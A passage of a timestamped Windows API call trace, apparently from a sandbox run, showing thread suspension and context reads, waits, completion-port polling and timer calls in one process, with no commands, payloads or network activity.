hSourceHandle=0x80, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x2788f928, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x2788f928*=0xc8) returned 1 [0057.034] SuspendThread (hThread=0xc8) returned 0x0 [0057.034] GetThreadContext (in: hThread=0xc8, lpContext=0x2788f940 | out: lpContext=0x2788f940*(P1Home=0x0, P2Home=0x0, P3Home=0x0, P4Home=0x0, P5Home=0x0, P6Home=0x0, ContextFlags=0x100001, MxCsr=0x0, SegCs=0x33, SegDs=0x0, SegEs=0x0, SegFs=0x0, SegGs=0x0, SegSs=0x2b, EFlags=0x10246, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, Rax=0x0, Rcx=0x0, Rdx=0x0, Rbx=0x0, Rsp=0x22fc58, Rbp=0x0, Rsi=0x0, Rdi=0x0, R8=0x0, R9=0x0, R10=0x0, R11=0x0, R12=0x0, R13=0x0, R14=0x0, R15=0x0, Rip=0x77ab149a, FltSave.ControlWord=0x0, FltSave.StatusWord=0x0, FltSave.TagWord=0x0, FltSave.Reserved1=0x0, FltSave.ErrorOpcode=0x0, FltSave.ErrorOffset=0x0, FltSave.ErrorSelector=0x0, FltSave.Reserved2=0x0, FltSave.DataOffset=0x0, FltSave.DataSelector=0x0, FltSave.Reserved3=0x0, FltSave.MxCsr=0x0, FltSave.MxCsr_Mask=0x0, FltSave.FloatRegisters.Low=0x0, FltSave.FloatRegisters.High=0x0, FltSave.XmmRegisters.Low=0x0, FltSave.XmmRegisters.High=0x0, FltSave.Reserved4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0), FltSave.StackControl=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0), FltSave.Cr0NpxState=0x0, Header.Low=0x0, Header.High=0x0, Legacy.Low=0x0, Legacy.High=0x0, Xmm0.Low=0x0, Xmm0.High=0x0, Xmm1.Low=0x0, Xmm1.High=0x0, Xmm2.Low=0x0, Xmm2.High=0x0, Xmm3.Low=0x0, Xmm3.High=0x0, Xmm4.Low=0x0, Xmm4.High=0x0, Xmm5.Low=0x0, Xmm5.High=0x0, Xmm6.Low=0x0, Xmm6.High=0x0, Xmm7.Low=0x0, Xmm7.High=0x0, Xmm8.Low=0x0, Xmm8.High=0x0, Xmm9.Low=0x0, Xmm9.High=0x0, Xmm10.Low=0x0, Xmm10.High=0x0, Xmm11.Low=0x0, Xmm11.High=0x0, Xmm12.Low=0x0, Xmm12.High=0x0, Xmm13.Low=0x0, Xmm13.High=0x0, Xmm14.Low=0x0, Xmm14.High=0x0, Xmm15.Low=0x0, Xmm15.High=0x0, VectorRegister.Low=0x0, VectorRegister.High=0x0, VectorControl=0x0, DebugControl=0x0, LastBranchToRip=0x0, LastBranchFromRip=0x0, LastExceptionToRip=0x0, LastExceptionFromRip=0x0)) returned 1 [0057.035] ResumeThread (hThread=0xc8) returned 0x1 [0057.035] CloseHandle (hObject=0xc8) returned 1 [0057.035] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0057.052] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0057.060] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0057.062] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0057.067] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0057.071] SetEvent (hEvent=0xa0) returned 1 [0057.071] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0057.315] timeEndPeriod (uPeriod=0x1) returned 0x0 [0057.315] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x100 [0057.315] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x104 [0057.315] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0057.574] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0057.574] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0057.589] SetEvent (hEvent=0xa0) returned 1 [0057.589] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0057.958] timeEndPeriod (uPeriod=0x1) returned 0x0 [0057.958] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xe9fe) returned 0x0 [0057.975] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0057.976] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4625a0, lpParameter=0xc000081500, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd8 [0057.994] CloseHandle (hObject=0xd8) returned 1 [0057.994] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0058.010] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0058.012] timeEndPeriod (uPeriod=0x1) returned 0x0 [0058.012] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0090.610] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0090.610] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0090.618] timeEndPeriod (uPeriod=0x1) returned 0x0 [0090.618] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0090.664] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0090.664] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0090.665] timeEndPeriod (uPeriod=0x1) returned 0x0 [0090.666] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0092.833] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0092.833] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0092.835] timeEndPeriod (uPeriod=0x1) returned 0x0 [0092.835] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0093.730] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0093.730] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0093.764] timeEndPeriod (uPeriod=0x1) returned 0x0 [0093.764] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0094.138] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0094.138] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0094.184] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0094.185] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0094.191] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0094.200] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0094.200] SetEvent (hEvent=0x90) returned 1 [0094.200] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0094.206] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0094.210] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0094.210] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0094.227] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0094.227] SetEvent (hEvent=0xec) returned 1 [0094.227] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0094.233] timeEndPeriod (uPeriod=0x1) returned 0x0 [0094.233] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0175.025] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0175.025] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0175.025] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x80, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x2788f928, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x2788f928*=0xf8) returned 1 [0175.026] SuspendThread (hThread=0xf8) returned 0x0 [0175.026] GetThreadContext (in: hThread=0xf8, lpContext=0x2788f940 | out: lpContext=0x2788f940*(P1Home=0x0, P2Home=0x0, P3Home=0x0, P4Home=0x0, P5Home=0x0, P6Home=0x0, ContextFlags=0x100001, MxCsr=0x0, SegCs=0x33, SegDs=0x0, SegEs=0x0, SegFs=0x0, SegGs=0x0, SegSs=0x2b, EFlags=0x10287, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, Rax=0x0, Rcx=0x0, Rdx=0x0, Rbx=0x0, Rsp=0xc00010fe10, Rbp=0x0, Rsi=0x0, Rdi=0x0, R8=0x0, R9=0x0, R10=0x0, R11=0x0, R12=0x0, R13=0x0, R14=0x0, R15=0x0, Rip=0x40c593, FltSave.ControlWord=0x0, FltSave.StatusWord=0x0, FltSave.TagWord=0x0, FltSave.Reserved1=0x0, FltSave.ErrorOpcode=0x0, FltSave.ErrorOffset=0x0, FltSave.ErrorSelector=0x0, FltSave.Reserved2=0x0, FltSave.DataOffset=0x0, FltSave.DataSelector=0x0, FltSave.Reserved3=0x0, FltSave.MxCsr=0x0, FltSave.MxCsr_Mask=0x0, FltSave.FloatRegisters.Low=0x0, FltSave.FloatRegisters.High=0x0, FltSave.XmmRegisters.Low=0x0, FltSave.XmmRegisters.High=0x0, FltSave.Reserved4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0), FltSave.StackControl=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0), FltSave.Cr0NpxState=0x0, Header.Low=0x0, Header.High=0x0, Legacy.Low=0x0, Legacy.High=0x0, Xmm0.Low=0x0, Xmm0.High=0x0, Xmm1.Low=0x0, Xmm1.High=0x0, Xmm2.Low=0x0, Xmm2.High=0x0, Xmm3.Low=0x0, Xmm3.High=0x0, Xmm4.Low=0x0, Xmm4.High=0x0, Xmm5.Low=0x0, Xmm5.High=0x0, Xmm6.Low=0x0, Xmm6.High=0x0, Xmm7.Low=0x0, Xmm7.High=0x0, Xmm8.Low=0x0, Xmm8.High=0x0, Xmm9.Low=0x0, Xmm9.High=0x0, Xmm10.Low=0x0, Xmm10.High=0x0, Xmm11.Low=0x0, Xmm11.High=0x0, Xmm12.Low=0x0, Xmm12.High=0x0, Xmm13.Low=0x0, Xmm13.High=0x0, Xmm14.Low=0x0, Xmm14.High=0x0, Xmm15.Low=0x0, Xmm15.High=0x0, VectorRegister.Low=0x0, VectorRegister.High=0x0, VectorControl=0x0, DebugControl=0x0, LastBranchToRip=0x0, LastBranchFromRip=0x0, LastExceptionToRip=0x0, LastExceptionFromRip=0x0)) returned 1 [0175.035] ResumeThread (hThread=0xf8) returned 0x1 [0175.035] CloseHandle (hObject=0xf8) returned 1 [0175.035] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0175.044] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0175.044] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0175.045] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0175.045] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0175.046] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0175.051] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0175.052] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0175.052] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0175.053] SetEvent (hEvent=0xec) returned 1 [0175.053] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0175.056] timeEndPeriod (uPeriod=0x1) returned 0x0 [0175.056] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0179.034] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0179.034] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0179.034] SetEvent (hEvent=0xec) returned 1 [0179.034] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0179.041] timeEndPeriod (uPeriod=0x1) returned 0x0 [0179.041] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0185.075] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0185.075] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0185.075] SetEvent (hEvent=0xec) returned 1 [0185.075] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0185.090] timeEndPeriod (uPeriod=0x1) returned 0x0 [0185.090] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0198.656] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0198.665] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0198.665] SetEvent (hEvent=0xec) returned 1 [0198.665] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0198.699] timeEndPeriod (uPeriod=0x1) returned 0x0 [0198.699] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0200.276] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0200.276] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0200.276] SetEvent (hEvent=0xec) returned 1 [0200.277] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0200.317] timeEndPeriod (uPeriod=0x1) returned 0x0 [0200.317] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0202.119] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0202.119] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0202.119] SetEvent (hEvent=0xec) returned 1 [0202.119] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0202.321] timeEndPeriod (uPeriod=0x1) returned 0x0 [0202.321] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0206.774] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0206.774] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0206.774] SetEvent (hEvent=0xec) returned 1 [0206.774] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0206.785] timeEndPeriod (uPeriod=0x1) returned 0x0 [0206.785] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0209.018] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0209.018] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0209.018] SetEvent (hEvent=0xec) returned 1 [0209.018] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0209.031] timeEndPeriod (uPeriod=0x1) returned 0x0 [0209.031] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0211.696] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0211.696] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0211.696] SetEvent (hEvent=0xec) returned 1 [0211.697] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0211.700] timeEndPeriod (uPeriod=0x1) returned 0x0 [0211.700] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0213.567] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0213.567] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0213.568] SetEvent (hEvent=0xec) returned 1 [0213.568] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0213.581] timeEndPeriod (uPeriod=0x1) returned 0x0 [0213.581] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0218.213] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0218.213] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0218.213] SetEvent (hEvent=0xec) returned 1 [0218.213] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0218.236] timeEndPeriod (uPeriod=0x1) returned 0x0 [0218.236] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0220.619] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0220.620] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0220.620] SetEvent (hEvent=0xec) returned 1 [0220.620] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0220.626] timeEndPeriod (uPeriod=0x1) returned 0x0 [0220.626] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0222.323] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0222.323] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0222.326] SetEvent (hEvent=0xec) returned 1 [0222.326] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0222.334] timeEndPeriod (uPeriod=0x1) returned 0x0 [0222.334] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 